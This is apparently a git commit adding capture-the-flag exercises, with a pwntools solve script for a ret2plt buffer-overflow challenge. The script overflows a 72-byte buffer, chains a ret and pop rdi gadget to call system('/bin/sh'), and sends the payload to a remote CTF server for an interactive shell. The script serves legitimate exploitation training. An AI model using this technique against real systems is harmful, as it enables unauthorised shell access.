Second CTFs part

2026-05-10 20:42:33 +02:00
parent 5635246581
commit 9f240eba3b
87 changed files with 404506 additions and 0 deletions
--- a/ret2libc/01_neon_diner/ret2plt
+++ b/ret2libc/01_neon_diner/ret2plt
--- a/ret2libc/01_neon_diner/solve.py
+++ b/ret2libc/01_neon_diner/solve.py
@@ -0,0 +1,25 @@
+from pwn import *
+
+context.binary = elf = ELF('./ret2plt', checksec=False)
+
+OFFSET_TO_RIP = 72
+
+#p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13501)
+
+pop_rdi = elf.sym.pop_rdi_ret
+binsh = next(elf.search(b'/bin/sh\x00'))
+ret = ROP(elf).find_gadget(['ret']).address
+
+payload = flat(
+    b'A'*OFFSET_TO_RIP,
+    p64(ret),
+    p64(pop_rdi),
+    p64(binsh),
+    p64(elf.plt.system),
+)
+
+p.recvuntil(b'order?\n')
+p.send(payload)
+p.interactive()
+